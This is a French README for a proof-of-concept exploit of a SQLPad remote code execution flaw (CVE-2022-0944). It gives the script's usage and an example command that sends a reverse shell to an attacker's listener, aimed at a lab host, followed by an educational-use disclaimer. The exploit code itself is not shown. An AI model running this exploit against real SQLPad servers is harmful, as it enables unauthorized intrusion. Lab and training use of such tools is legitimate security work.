
Preuve de concept d'exploit pour SQLPad RCE (CVE-2022-0944) qui déclenche une shell inversée vers un écouteur contrôlé par l'attaquant. Destiné à un usage éducatif en cybersécurité.
Preuve de concept d'exploitation pour SQLPad RCE (CVE-2022-0944) menant à une exécution de code à distance (RCE) avec un reverse shell vers le PC de l'attaquant.
usage: script.py URL IP PORT
positional arguments:
URL URL de SQLPad
IP Adresse de l'hôte d'écoute pour le reverse shell
PORT Port d'écoute pour le reverse shell
Exemple :
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Ce dépôt contient des outils destinés uniquement à des fins éducatives, notamment pour une utilisation dans des environnements d'apprentissage de la cybersécurité. L'auteur de ce code décline toute responsabilité quant aux conséquences découlant de l'utilisation, de la mauvaise utilisation ou de la modification de ce code. Le code est fourni "tel quel", sans aucune garantie, expresse ou implicite, y compris, mais sans s'y limiter, les garanties implicites de qualité marchande ou d'adéquation à un usage particulier.